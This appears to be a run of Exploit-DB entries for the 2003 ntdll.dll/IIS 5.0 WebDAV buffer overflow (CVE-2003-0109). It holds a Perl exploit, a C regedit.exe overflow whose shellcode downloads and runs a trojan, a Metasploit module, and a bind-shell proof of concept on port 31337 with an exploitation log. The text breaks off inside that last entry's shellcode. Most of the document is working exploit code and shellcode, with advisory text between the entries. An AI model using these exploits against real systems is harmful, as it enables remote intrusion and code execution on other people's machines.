"%ud2e1%u741b", "%ud2f5%u741b", "%ud2f5%u77e5", "%ud309%u741b", "%ud31d%u741b", "%ud38a%u7901", "%ud3aa%u7763", "%ud3b9%u7763", "%ud3bf%u7901", "%ud3d7%u7763", "%ud3db%u77dc", "%ud4f5%u6b32", "%ud514%u77ac", "%ud51e%u77ac", "%ud52d%u77e5", "%ud539%u6b32", "%ud541%u6df5", "%ud545%u7800", "%ud6dc%u77d7", "%ud6e2%u77a5", "%ud700%u77e2", "%ud75b%u7900", "%ud780%u7900", "%ue00e%u7900", "%ue010%u7738", "%ue020%u77db", "%ue02b%u77ac", "%ue04c%u7738", "%ue04e%u6ed4", "%ue056%u6ed4", "%ue0ad%u779e", "%ue0af%u7800", "%uec00%u672e", "%uf906%u7800", "%uf909%u7763", "%uf93f%u7763", "%uf942%u751a", "%uf94b%u77e9", "%uf964%u77ac", "%uf966%u7763", "%uf968%u751a", "%uf974%u77ac", "%uf981%u751a", "%uf991%u7763", "%uf9a6%u7300", "%uf9b3%u751a", "%uf9c2%u7763", "%uf9cd%u751a", "%uf9e9%u7763", "%uf9fb%u7300" ); foreach my $return_address (@return_addresses) { ######### return address ############ my $return_address_part=""; $return_address_part=""; $return_address_part.="%u3073"; $return_address_part.="%u3075"; $return_address_part.="%u3074"; $return_address_part.=$return_address; $return_address_part.="%ucc38"x22; ##################################### ############ offsets ############## my $offset_len=280; my $offset_part="X"x$offset_len; ##################################### my $shellcode_len=$url_len-(length($return_address_part)/6+$offset_len); my $offset_of_part_shell=0; print "len-> $url_len=$shellcode_len:$offset_len\n"; my $decoder_str="%uC931%u79B1%uc1fe%ucb01%uc38b%uc789%uc289%uc931%u9041%u9041%uc38b%uc801%u338b%uce8b%u308b%uc68b%uc801%u00b4%uc689%uc78b%u3089%uc931%u03b1%u9041%ucb01%u9047%uf989%ud129%uc031%ue0b0%u03b4%uc129%uc985%uca75%uc985"; my $decoder_str_len=length($decoder_str)/6; my $patch_esp="\x44\x45\x76\x76"; my $nop="%u0048%u0048"; my $encoded_str="${nop}${patch_esp}${shellcode}"; my $unicoded_encoded_str_len=4*5; my $shellcode_part=""; $shellcode_part=""; $shellcode_part.=$decoder_str; $shellcode_part.=$encoded_str; $shellcode_part.="A"x($shellcode_len-($decoder_str_len+length($encoded_str)-$unicoded_encoded_str_len-1)); my $url="/${offset_part}${return_address_part}${shellcode_part}"; for my $METHOD ("LOCK") { my $string_to_send="$METHOD $url HTTP/1.1\r\n${host_header}${destination}${lock_token}${translate_f}${depth}Content-Type: text/xml\r\nContent-Length: $length_of_body\r\n${connection_str}\r\n${body}"; my $results=""; $results=""; while($results eq "") { print STDERR "Retrying Connection...\n"; $results=sendraw2("GET / HTTP/1.0\r\n\r\n",$host,$port,15); if($results eq "") { sleep(1); } } print STDERR "Trying with [$return_address]\n"; $results=sendraw2($string_to_send,$host,$port,15); if($results eq "") { print "Connection refused: Server crashed?\n"; }else{ print "Failed to exploit: Server not crashed\n"; } } } sub sendraw2 { my ($pstr,$realip,$realport,$timeout)=@_; my $target2=inet_aton($realip); my $flagexit=0; $SIG{ALRM}=\&ermm; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || return "0"; #die("Socket problems"); alarm($timeout); if(connect(S,pack "SnA4x8",2,$realport,$target2)) { alarm(0); my @in; select(S); $|=1; print $pstr; alarm($timeout); while(<S>){ if($flagexit == 1) { close (S); return "Timeout"; } push @in, $_; } alarm(0); select(STDOUT); close(S); return join '',@in; }else{ close(S); return ""; } } sub ermm { $flagexit=1; close (S); }

// source: https://www.securityfocus.com/bid/7116/info The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker. Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface. ** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances. ** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks. ** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function. ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability. /*************************************** *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@* *@ REGEDIT Buffer Overflow Exploit ! @* *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@* * * * Discovered & coded By ThreaT. * * * *#####################################* *# -> [email protected] #* *# -> http://www.chez.com/mvm #* *# -> http://s0h.cc/~threat #* *#####################################* * Date : 31/03/2003 * *************************************** */ /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * This exploit create a malicious .reg file * * that when it try to write data into the * * registery, overwrite the ret addr, because * * a ReadFile() unchecked function work with * * a static buffer, and execute our abitrary * * code who download a trojan for local * * execution without user ask ! * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> compile : cl regexploit.c usage : regexploit.exe <url> <url> is a full link to an executable file, it can be like http://www.host.com/trojan.exe or file://c:/path/executable.exe */ // Tested on Win2k pro & server (fr) SP0 SP1 SP2 & SP3 #include <windows.h> HANDLE RegFile; char *ToWideChar(const char *cszANSIstring) { int nBufSize; WCHAR *wideString; if(cszANSIstring == NULL) return NULL; nBufSize = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, NULL, 0 ); wideString = (WCHAR *)malloc(nBufSize +1); MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, wideString, nBufSize); return (char*)(wideString); } void Write (const char *str, int number) { DWORD lpNumberOfBytesWritten; WriteFile (RegFile,str,number,&lpNumberOfBytesWritten,NULL); } void main (int argc, char *argv[]) { int i; char entete[] = "Windows Registry Editor Version 5.00\r\n\r\n" "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Discovered\\and\\coded\\by\\ThreaT]\r\n", *MastaBuff, *myurl, RealGenericShellcode[] = "\xAA\xC6\x02\x01" // Adresse de retour // nop "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // decrypteur de shellcode "\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC" "\x34\x99\xAA\x84\xC0\x75\xF8" // shellcode xorised avec 0x99 "\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91" "\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12" "\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a" "\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81" "\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6" "\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42" "\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec" "\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5" "\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc" "\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1" "\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98" "\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66" "\x66\x49\x71\xe6\x66\x66\x66"; printf ("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n" "Regedit.exe Buffer Overflow Exploit\n" "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n" "Discovered & Coded By ThreaT.\n\n" "contact : [email protected]\n" "URL : http://www.chez.com/mvm\n\n"); if (!argv[1]) { printf ("_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n" "Usage : regexploit.exe <URL://trojan.exe>\n" "Exemple : regexploit.exe file://c:/winnt/system32/cmd.exe\n" "_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n"); ExitProcess (0); } /* Creation du fichier Reg malicieux */ RegFile = CreateFile ("VulnFile.reg",GENERIC_WRITE,FILE_SHARE_WRITE, NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); if (RegFile == INVALID_HANDLE_VALUE) { printf ("Cannot create a vuln regfile !\n"); ExitProcess (0); } Write ("\xFF\xFE",2); // header .reg script Write (ToWideChar (entete),strlen (entete)*2); // entê regedit MastaBuff = (char *) LocalAlloc (LPTR,270); // rempli la premiere partie MastaBuff[0] = '"'; memset (&MastaBuff[1],'0',260); // avec des zeros Write (ToWideChar (MastaBuff),strlen (MastaBuff)*2); // Ecrit dans le fichier la 1er parti de la vuln str myurl = (char *) LocalAlloc (LPTR, strlen (argv[1])+10); lstrcpy (myurl,argv[1]); for (i=0; i < strlen (argv[1]); argv[1][i++]^=0x99); // encrypte l'URL lstrcat (RealGenericShellcode,argv[1]); // creation du shellcode final lstrcat (RealGenericShellcode,"\x99"); // caractere de terminaison Write (RealGenericShellcode,strlen (RealGenericShellcode)); // rajoute le shellcode au fichier CloseHandle (RegFile); printf ("un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree\n" "pour downloader et executer '%s'\n",myurl); } /********************* D:\code\exploits\regedit>cl regexploit.c Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86 Copyright (C) Microsoft Corp 1984-1998. All rights reserved. regexploit.c Microsoft (R) Incremental Linker Version 6.00.8168 Copyright (C) Microsoft Corp 1992-1998. All rights reserved. /out:regexploit.exe regexploit.obj D:\code\exploits\regedit>regexploit @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Regedit.exe Buffer Overflow Exploit @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Discovered & Coded By ThreaT. contact : [email protected] URL : http://www.chez.com/mvm _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ Usage : regexploit.exe <URL://trojan.exe> Exemple : regexploit.exe file://c:/winnt/system32/cmd.exe _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ D:\code\exploits\regedit>regexploit file://c:/winnt/system32/cmd.exe @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Regedit.exe Buffer Overflow Exploit @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Discovered & Coded By ThreaT. contact : [email protected] URL : http://www.chez.com/mvm un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree pour downloader et executer 'file://c:/winnt/system32/cmd.exe' D:\code\exploits\regedit>dir VulnFile.reg Le volume dans le lecteur D n'a pas de nom. Le numé de sée du volume est 90CC-3FC3 Rértoire de D:\code\exploits\regedit 31/03/2003 14:54 1 015 VulnFile.reg 1 fichier(s) 1 015 octets 0 Rés) 5 602 033 664 octets libres D:\code\exploits\regedit>VulnFile.reg D:\code\exploits\regedit> ês vous sû vouloir ajouter l'information dans d:\code\exploits\regedit\VulnFile.reg dans le registre ? -> OUI Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. D:\code\exploits\regedit> this is too easy... *********************/

E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/ source: https://www.securityfocus.com/bid/7116/info The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker. Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface. ** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances. ** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks. ** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function. ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22367.zip

source: https://www.securityfocus.com/bid/7116/info The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker. Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface. ** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances. ** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks. ** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function. ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22368.tar.gz

## # $Id: ms03_007_ntdll_webdav.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow', 'Description' => %q{ This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against any service pack. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ [ 'CVE', '2003-0109'], [ 'OSVDB', '4467'], [ 'BID', '7116'], [ 'MSB', 'MS03-007'] ], 'Privileged' => false, 'Payload' => { 'Space' => 512, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic Brute Force', { } ], ], 'DisclosureDate' => 'May 30 2003', 'DefaultTarget' => 0)) register_evasion_options( [ OptBool.new('invalid_search_request', [false, 'Replace the valid XML search with random data', 'false']), # XXX - ugh, there has to be a better way to remove entries from an # enum that overwriting the evalable enum option OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none','hex-normal'], 'none']) ], self.class ) deregister_options('HTTP::junk_params', 'HTTP::header_folding') end def autofilter # Common vulnerability scanning tools report port 445/139 # due to how they test for the vulnerability. Remap this # back to 80 for automated exploitation rport = datastore['RPORT'].to_i if ( rport == 139 or rport == 445 ) rport = 80 end true end def check url = 'x' * 65535 xml = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" + "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n" response = send_request_cgi({ 'uri' => '/' + url, 'ctype' => 'text/xml', 'method' => 'SEARCH', 'data' => xml }, 5) if (response and response.body =~ /Server Error\(exception/) return Exploit::CheckCode::Vulnerable end # Did the server stop acceping requests? begin send_request_raw({'uri' => '/'}, 5) rescue return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit # verify the service is running up front send_request_raw({'uri' => '/'}, 5) # The targets in the most likely order they will work targets = [ # Almost Targetted :) "\x4f\x4e", # =SP3 "\x41\x42", # ~SP0 ~SP2 "\x41\x43", # ~SP1, ~SP2 # Generic Bruteforce "\x41\xc1", "\x41\xc3", "\x41\xc9", "\x41\xca", "\x41\xcb", "\x41\xcc", "\x41\xcd", "\x41\xce", "\x41\xcf", "\x41\xd0", ] xml = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" + "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n" if datastore['invalid_search_request'] == true xml = rand_text(rand(1024) + 32) end # The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A' # This decodes to "inc ecx" url = 'A' * 65516 url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded targets.each { |ret| print_status("Trying return address 0x%.8x..." % Rex::Text.to_unicode(ret).unpack('V')[0]) url[ 283, 2 ] = ret begin send_request_cgi({ 'uri' => '/' + url, 'ctype' => 'text/xml', 'method' => 'SEARCH', 'data' => xml }, 5) handler rescue => e print_error("Attempt failed: #{e}") end 1.upto(8) { |i| select(nil,nil,nil,0.25) return if self.session_created? } if !service_running? print_error('Giving up, IIS must have completely crashed') return end } end # Try connecting to the server up to 20 times, with a two second gap # This gives the server time to recover after a failed exploit attempt def service_running? print_status('Checking if IIS is back up after a failed attempt...') 1.upto(20) {|i| begin send_request_raw({'uri' => '/'}, 5) rescue print_error("Connection failed (#{i} of 20)...") select(nil,nil,nil,2) next end return true } return false end end

/*************************************/ /* IIS 5.0 WebDAV -Proof of concept- */ /* [ Bug: CAN-2003-0109 ] */ /* By Roman Medina-Heigl Hernandez */ /* aka RoMaNSoFt <[email protected]> */ /* Madrid, 23.Mar.2003 */ /* ================================= */ /* Public release. Version 1. */ /* --------------------------------- */ /*************************************/ /* ==================================================================== * --[ READ ME ] * * This exploit is mainly a proof of concept of the recently discovered ntdll.dll bug (which may be * exploited in many other programs, not necessarily IIS). Practical exploitation is not as easy as * expected due to difficult RET guessing mixed with possible IIS crashes (which makes RET brute * forcing a tedious work). The shellcode included here will bind a cmd.exe shell to a given port * at the victim machine so it could be problematic if that machine is protected behind a firewall. * For all these reasons, the scope of this code is limited and mainly intended for educational * purposes. I am not responsible of possible damages created by the use of this exploit code. * * The program sends a HTTP request like this: * * SEARCH /[nop] [ret][ret][ret] ... [ret] [nop][nop][nop][nop][nop] ... [nop] [jmpcode] HTTP/1.1 * {HTTP headers here} * {HTTP body with webDAV content} * 0x01 [shellcode] * * IIS converts the first ascii string ([nop]...[jmpcode]) to Unicode using UTF-16 encoding (for * instance, 0x41 becomes 0x41 0x00, i.e. an extra 0x00 byte is added) and it is the resultant * Unicode string the one producing the overflow. So at first glance, we cannot include code here * (more on this later) because it would get corrupted by 0x00 (and other) inserted bytes. Not at * least using the common method. Another problem that we will have to live with is our RET value * being padded with null bytes, so if we use 0xabcd in our string, the real RET value (i.e. the * one EIP will be overwritten with) would be 0x00ab00cd. This is an important restriction. * * We have two alternatives: * * 1) The easy one: find any occurrences of our ascii string (i.e. before it gets converted to * the Unicode form) in process memory. Problem: normally we should find it by debugging the * vulnerable application and then hardcode the found address (which will be the RET address) * in our exploit code. This RET address is variable, even for the same version of OS and app * (I mean, different instances of the same application in the same machine could make the * guessed RET address invalid at different moments). Now add the restriction of RET value * padded with null-bytes. Anyway, the main advantage of this method is that we will not have * to deal with 0x00-padded shellcode. * * 2) The not so-easy one: you could insert an encoded shellcode in such a way that when the app * expands the ascii string (with the encoded shellcode) to Unicode, a valid shellcode is * automagically placed into memory. Please, refer to Chris Anley's "venetian exploit" paper * to read more about this. Dave Aitel also has a good paper about this technique and indeed * he released code written in Python to encode shellcode (I'm wondering if he will release a * working tool for that purpose, since the actual code was released as part of a commercial * product, so it cannot be run without buying the whole product, despite the module itself * being free!). Problem: it is not so easy as the first method ;-) Advantage: when the over- * flow happens, some registers may point to our Unicoded string (where our Unicoded-shellcode * lives in), so we don't need to guess the address where shellcode will be placed and the * chance of a successful exploitation is greatly improved. For instance, in this case, when * IIS is overflowed, ECX register points to the Unicode string. The idea is then fill in * RET value with the fixed address of code like "call %ecx". This code may be contained in * any previosly-loaded library, for example). * * Well, guess it... yes... I chose the easy method :-) Perhaps I will rewrite the exploit * using method 2, but I cannot promise that. * * Let's see another problem of the method 1 (which I have used). Not all Unicode conversions * result in a 0x00 byte being added. This is true for ascii characters lower or equal to 0x7f * (except for some few special characters, I'm not sure). But our shellcode will have bytes * greater than 0x7f value. So we don't know the exact length of the Unicoded-string containing * our shellcode (some ascii chars will expand to more than 2 bytes, I think). As a result, * sometimes the exploit may not work, because no exact length is matched. For instance, if you * carry out experiments on this issue, you could see that IIS crashes (overflow occurs) when * entering a query like SEARCH /AAAA...AAA HTTP/1.1, with 65535 A's. Same happens with 65536. * But with different values seems NOT to work. So matching the exact length is important here! * * What I have done, it is to include a little "jumpcode" instead of the shellcode itself. The * jumpcode is placed into the "critical" place and has a fixed length, so our string has always * a fixed length, too. The "variable" part (the shellcode) is placed at the end of the HTTP * request (so you can insert your own shellcode and remove the one I'm using here, with no apparent * problem). To be precise, the end of the request will be: 0x01 [shellcode]. The 0x01 byte marks * the beginning of the shellcode and it is used by the jumpcode to find the address where shell- * code begins and jump into it. It is not possible to hardcode a relative jump, because HTTP * headers have a variable length (think about the "Host:" header and you will understand what * I'm saying). Well, really, the exploit could have calculated the relative jump itself (other * problems arise like null-bytes possibly contained in the offset field) but I have prefered to * use the 0x01 trick. It's my exploit, it's my choice :-) * * After launching the exploit, several things may happen: * - the exploit is successful. You can connect to the bound port of victim machine and get a * shell. Great. Remember that when you issue an "exit" command in the shell prompt, the pro- * cess will be terminated. This implies that IIS could die. * - exploit returns a "server not vulnerable" response. Really, the server may not be vulnerable * or perhaps the SEARCH method used by the exploit is not permitted (the bug can still be * exploited via GET, probably) or webDAV is disabled at all. * - exploit did not get success (which is not strange, since it is not easy to guess RET value) * but the server is vulnerable. IIS will probably not survive: a "net start w3svc" could be * needed in the victim machine, in order to restart the WWW service. * * The following log shows a correct exploitation: * * roman@goliat:~/iis5webdav> gcc -o rs_iis rs_iis.c * roman@goliat:~/iis5webdav> ./rs_iis roman * [*] Resolving hostname ... * [*] Attacking port 80 at roman (EIP = 0x00480004)... * [*] Now open another console/shell and try to connect (telnet) to victim port 31337... * * roman@goliat:~/iis5webdav> telnet roman 31337 * Trying 192.168.0.247... * Connected to roman. * Escape character is '^]'. * Microsoft Windows 2000 [Versi¢n 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32> * * * I am not going to show logs for the faulty cases. I'm pretty sure you will see them very * soon :-) But yes, the exploit works, perhaps a little fine-tunning may be required, though. * So please, do NOT contact me telling that the exploit doesn't work or things like that. It * worked for me and it will work for you, if you're not a script-kiddie. Try to attach to the * IIS process (inetinfo.exe) with the help of a debugger (OllyDbg is my favourite) on the * victim machine and then launch the exploit against it. Debugger will break when the first * exception is produced. Now place a breakpoint in 0x00ab00cd (being 0xabcd the not-unicoded * RET value) and resume execution until you reach that point. Finally, it's time to search * the memory looking for our shellcode. It is nearly impossible (very low chance) that our * shellcode is found at any 0x00**00**-form address (needed to bypass the RET restriction * imposed by Unicode conversion) but no problem: you have a lot of NOPs before the shellcode * where you could point to. If EIP is overwritten with the address of such a NOP, program flow * will finish reaching our shellcode. Note also that among the two bytes of RET that we have some * kind of control, the more important is the first one, i.e. the more significant. In other * words, interesting RET values to try are: 0x0104, 0x0204, 0x0304, 0x0404, 0x0504, ..., * and so on, till 0xff04. As you may have noticed, the last byte (0x04) is never changed because * its weight is minimal (256 between aprox. 65000 NOP's is not appreciable). * * * My best wishes, * --Roman * * ===================================== --[ EOT ]-- ==================== */ #include <stdio.h> #include <errno.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> // Change to fit your need #define RET 0x4804 // EIP = 0x00480004 #define LOADLIBRARYA 0x0100107c #define GETPROCADDRESS 0x01001034 // Don't change this #define PORT_OFFSET 1052 #define LOADL_OFFSET 798 #define GETPROC_OFFSET 815 #define NOP 0x90 #define MAXBUF 100000 /* * LoadLibraryA IT Address := 0100107C * GetProcAddress IT Address := 01001034 */ unsigned char shellcode[] = // Deepzone shellcode "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c" "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04" "\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99" "\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14" "\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b" "\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9" "\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3" "\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99" "\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99" "\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9" "\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9" "\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c" "\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf" "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf" "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc" "\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9" "\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9" "\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c" "\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99" "\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89" "\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3" "\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1" "\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf" "\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9" "\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66" "\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99" "\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf" "\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32" "\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14" "\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3" "\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59" "\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70" "\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66" "\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b" "\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99" "\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9" 